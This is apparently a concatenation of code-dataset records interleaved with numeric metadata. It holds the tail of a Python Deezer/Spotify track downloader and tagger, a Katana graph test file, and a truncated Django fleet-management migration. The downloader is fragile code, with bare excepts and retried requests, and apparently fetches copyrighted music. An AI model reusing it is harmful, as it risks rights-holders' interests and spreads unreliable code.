if check == False:
continue
print(dir + name)
ans = input("Song already exist do you want to redownload it?(y or n):")
if not ans == "y":
return
try:
self.download(urls[a], dir)
except TrackNotFound:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for b in range(url['total'] + 1):
if url['data'][b]['title'] == music[a] or url['data'][b]['title_short'] in music[a]:
URL = url['data'][b]['link']
break
except IndexError:
try:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for b in range(url['total'] + 1):
if music[a].split(" ")[0] in url['data'][b]['title']:
URL = url['data'][b]['link']
break
except IndexError:
print("\nTrack not found: " + music[a] + " - " + artist[a])
continue
self.download(URL, dir)
urls[a] = URL
try:
os.rename(dir + urls[a].split("/")[-1] + ".mp3", dir + name)
except FileNotFoundError:
None
try:
tag = EasyID3(dir + name)
tag.delete()
except mutagen.id3.ID3NoHeaderError:
tag = mutagen.File(dir + name, easy=True)
tag.add_tags()
except:
continue
tag['artist'] = artist[a]
tag['title'] = music[a]
tag['date'] = year[0]
tag['album'] = album[0]
tag['tracknumber'] = str(tracknum[a])
tag['discnumber'] = str(discnum[a])
tag['genre'] = " & ".join(genre)
tag['albumartist'] = ", ".join(ar_album)
tag.save(v2_version=3)
audio = ID3(dir + name)
audio['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=image)
audio.save()
return names
def download_playlistspo(self, URL, output=localdir + "/Songs/", check=True):
global spo
array = []
if not len(URL) == 87 and not len(URL) == 69:
URL,a = URL.split("?")
if len(URL) != 87 and len(URL) != 69:
raise InvalidLink("Invalid link ;)")
URL = URL.split("/")
try:
tracks = spo.user_playlist_tracks(URL[-3], playlist_id=URL[-1])
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.user_playlist_tracks(URL[-3], playlist_id=URL[-1])
for a in tracks['items']:
try:
array.append(self.download_trackspo(a['track']['external_urls']['spotify'], output, check, True))
except IndexError:
print("\nTrack not found " + a['track']['name'])
array.append(localdir + "/Songs/" + a['track']['name'])
for a in range(tracks['total'] // 100):
try:
tracks = spo.next(tracks)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.next(tracks)
for a in tracks['items']:
try:
array.append(self.download_trackspo(a['track']['external_urls']['spotify'], output, check, True))
except IndexError:
print("\nTrack not found " + a['track']['name'])
array.append(localdir + "/Songs/" + a['track']['name'])
return array
def download_name(self, artist, song, output=localdir + "/Songs/", check=True):
global spo
try:
search = spo.search(q="track:" + song + " artist:" + artist)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
search = spo.search(q="track:" + song + " artist:" + artist)
try:
return self.download_trackspo(search['tracks']['items'][0]['external_urls']['spotify'], output, check)
except IndexError:
raise TrackNotFound("Track not found: " + artist + " - " + song)
| 43.958531
| 183
| 0.46147
| 3,818
| 37,101
| 4.447355
| 0.079885
| 0.032391
| 0.036042
| 0.042403
| 0.825383
| 0.816784
| 0.800236
| 0.783746
| 0.774087
| 0.752356
| 0
| 0.015451
| 0.380718
| 37,101
| 844
| 184
| 43.958531
| 0.723581
| 0.000458
| 0
| 0.818505
| 0
| 0
| 0.155943
| 0.001726
| 0.021352
| 0
| 0
| 0
| 0
| 1
| 0.024911
| false
| 0.003559
| 0.015421
| 0
| 0.073547
| 0.010676
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1639c7c4c9d044b4d0dc72e56e536517f9485bd
| 4,080
|
py
|
Python
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 1
|
2021-07-06T15:51:14.000Z
|
2021-07-06T15:51:14.000Z
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 2
|
2020-08-15T23:41:58.000Z
|
2020-08-29T04:46:35.000Z
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T08:46:05.000Z
|
2021-08-18T08:46:05.000Z
|
import metagraph as mg
import pytest
def test_num_nodes(katanagraph_rmat15_cleaned_di):
    """num_nodes() agrees with both the known count and node iteration."""
    graph = katanagraph_rmat15_cleaned_di.value
    seen = sum(1 for _ in graph)
    assert graph.num_nodes() == 32768
    assert graph.num_nodes() == seen
def test_num_edges(katanagraph_rmat15_cleaned_di):
    """num_edges() agrees with both the known count and per-node edge ids."""
    graph = katanagraph_rmat15_cleaned_di.value
    total = sum(len(graph.edge_ids(node)) for node in graph)
    assert graph.num_edges() == 363194
    assert graph.num_edges() == total
def test_node_schema(katanagraph_rmat15_cleaned_di):
    """The loaded node schema exposes names/types and is empty."""
    schema = katanagraph_rmat15_cleaned_di.value.loaded_node_schema()
    assert "names" in dir(schema)
    assert "types" in dir(schema)
    assert len(schema) == 0
def test_edge_schema(katanagraph_rmat15_cleaned_di):
    """The loaded edge schema exposes names/types and has one property."""
    schema = katanagraph_rmat15_cleaned_di.value.loaded_edge_schema()
    assert "names" in dir(schema)
    assert "types" in dir(schema)
    assert len(schema) == 1
def test_edge_property(katanagraph_rmat15_cleaned_di):
    """Edge property 'value' is reachable by index or by name."""
    graph = katanagraph_rmat15_cleaned_di.value
    assert graph.loaded_edge_schema()[0].name == "value"
    assert graph.get_edge_property(0) == graph.get_edge_property("value")
    assert graph.get_edge_property("value").to_pandas()[0] == 339302416426
def test_topology(katanagraph_rmat15_cleaned_di):
    """Spot-check edge id ranges and first destinations for nodes 0 and 8."""
    graph = katanagraph_rmat15_cleaned_di.value
    assert graph.edge_ids(0) == range(0, 20767)
    node0_dests = [graph.get_edge_dest(i) for i in graph.edge_ids(0)]
    assert node0_dests[0:5] == [1, 2, 3, 4, 5]
    assert graph.edge_ids(8) == range(36475, 41133)
    node8_dests = [graph.get_edge_dest(i) for i in graph.edge_ids(8)]
    assert node8_dests[0:5] == [0, 9, 10, 11, 12]
def test_num_nodes_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
    """Both NetworkX fixtures carry exactly 8 nodes."""
    for wrapped in (networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
        assert len(list(wrapped.value.nodes(data=True))) == 8
def test_num_edges_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
    """Both NetworkX fixtures carry exactly 12 edges."""
    for wrapped in (networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
        assert len(list(wrapped.value.edges(data=True))) == 12
def test_topology_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
    """Node sets match across fixtures; edge lists match the expected data."""
    undirected = networkx_weighted_undirected_8_12.value
    directed = networkx_weighted_directed_8_12.value
    assert list(undirected.nodes(data=True)) == list(directed.nodes(data=True))
    # Insertion order of the fixture, hence 3 and 4 before 2.
    assert list(undirected.nodes(data=True)) == [(n, {}) for n in (0, 1, 3, 4, 2, 5, 6, 7)]
    undirected_edges = [
        (0, 1, 4), (0, 3, 2), (0, 4, 7),
        (1, 3, 3), (1, 4, 5), (3, 4, 1),
        (4, 2, 5), (4, 7, 4), (2, 5, 2),
        (2, 6, 8), (5, 6, 4), (5, 7, 6),
    ]
    assert list(undirected.edges(data=True)) == [
        (u, v, {"weight": w}) for u, v, w in undirected_edges
    ]
    directed_edges = [
        (0, 1, 4), (0, 3, 2), (0, 4, 7),
        (1, 3, 3), (1, 4, 5), (3, 4, 1),
        (4, 7, 4), (2, 4, 5), (2, 5, 2),
        (2, 6, 8), (5, 6, 4), (5, 7, 6),
    ]
    assert list(directed.edges(data=True)) == [
        (u, v, {"weight": w}) for u, v, w in directed_edges
    ]
| 39.230769
| 117
| 0.668873
| 570
| 4,080
| 4.436842
| 0.114035
| 0.194939
| 0.275208
| 0.298142
| 0.887307
| 0.88019
| 0.879004
| 0.861605
| 0.752076
| 0.693159
| 0
| 0.07727
| 0.184804
| 4,080
| 103
| 118
| 39.61165
| 0.683103
| 0
| 0
| 0.329412
| 0
| 0
| 0.043873
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 1
| 0.105882
| false
| 0
| 0.023529
| 0
| 0.129412
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1a4bc6b9ecde53df63ca4c7ccc0e5cec70d840e
| 25,550
|
py
|
Python
|
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-06 11:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import lib.fields
class Migration(migrations.Migration):
    """Auto-generated migration wiring up the fleet_management foreign keys.

    Adds created_by/modified_by audit FKs, vehicle links, and the
    history_user FKs for the django-simple-history Historical* models.
    Generated by Django 1.11.7 — do not edit by hand.
    """
    # NOTE(review): initial=True while also depending on
    # fleet_management 0001_initial looks unusual — confirm against the
    # generator output before changing.
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('fleet_management', '0001_initial'),
        ('employees', '0002_auto_20171206_1331'),
        ('operations', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='vehicletyre',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_tyres', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicletyre',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_tyres', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicletyre',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='tyres', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='vehiclemaintenance',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicle_maintenance', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehiclemaintenance',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicle_maintenance', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehiclemaintenance',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='maintenance_plan', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='vehicledriver',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicle_drivers', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicledriver',
            name='driver',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='driver_vehicle', to='employees.Employee'),
        ),
        migrations.AddField(
            model_name='vehicledriver',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicle_drivers', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicledriver',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='vehicle_driver', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='vehicledocument',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_documents', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicledocument',
            name='document',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, to='operations.Document'),
        ),
        migrations.AddField(
            model_name='vehicledocument',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_documents', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicledocument',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='documents', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='vehicle',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicles', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='vehicle',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicles', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='tracker',
            name='address',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='tracker_address', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='tracker',
            name='contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='tracker_contact', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='tracker',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='tracker', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='purchasedetail',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_purchase_detail', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='purchasedetail',
            name='dealership_address',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='dealership_address', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='purchasedetail',
            name='dealership_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='dealership_contact', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='purchasedetail',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_purchase_detail', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='purchasedetail',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='purchase_detail', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='insurance',
            name='broker_address',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_broker_address', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='insurance',
            name='broker_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_broker_contact', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='insurance',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_insurance', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='insurance',
            name='insurer',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_insurer', to='operations.Insurer'),
        ),
        # NOTE(review): unlike the other modified_by fields this one is not
        # blank/null — confirm this asymmetry is intentional in the model.
        migrations.AddField(
            model_name='insurance',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='modified_insurance', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='insurance',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='insurance', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='incident',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_incidents', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='incident',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_incidents', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='incident',
            name='vehicle_driver',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='incident', to='fleet_management.VehicleDriver'),
        ),
        # Historical* models below belong to django-simple-history: their FKs
        # use db_constraint=False and related_name='+' (no reverse accessor).
        migrations.AddField(
            model_name='historicalvehicletyre',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehicletyre',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehicletyre',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehicletyre',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='historicalvehiclemaintenance',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehiclemaintenance',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehiclemaintenance',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehiclemaintenance',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='historicalvehicle',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehicle',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalvehicle',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='dealership_address',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='dealership_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalpurchasedetail',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='broker_address',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='broker_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='insurer',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Insurer'),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalinsurance',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='historicalfuelcard',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfuelcard',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfuelcard',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfuelcard',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='historicalfinancedetail',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfinancedetail',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfinancedetail',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalfinancedetail',
            name='purchase_detail',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.PurchaseDetail'),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='history_user',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='installer_address',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='installer_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='supplier_address',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='supplier_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='historicalbranding',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='fuelcardusage',
            name='fuel_card',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='fuel_card_usage', to='fleet_management.FuelCard'),
        ),
        migrations.AddField(
            model_name='fuelcard',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_fuel_cards', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='fuelcard',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_fuel_cards', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='fuelcard',
            name='vehicle',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fuel_card', to='fleet_management.Vehicle'),
        ),
        migrations.AddField(
            model_name='financedetail',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_finance_detail', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='financedetail',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_finance_detail', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='financedetail',
            name='purchase_detail',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finance_detail', to='fleet_management.PurchaseDetail'),
        ),
        # NOTE(review): branding audit fields reuse related_name
        # 'created_trackers'/'modified_trackers' — possibly a copy/paste
        # from the tracker model; verify against the models module.
        migrations.AddField(
            model_name='branding',
            name='created_by',
            field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_trackers', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='branding',
            name='installer_address',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_installer_address', to='operations.Address'),
        ),
        migrations.AddField(
            model_name='branding',
            name='installer_contact_person',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_installer_contact', to='operations.Contact'),
        ),
        migrations.AddField(
            model_name='branding',
            name='modified_by',
            field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_trackers', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='branding',
            name='supplier_address',
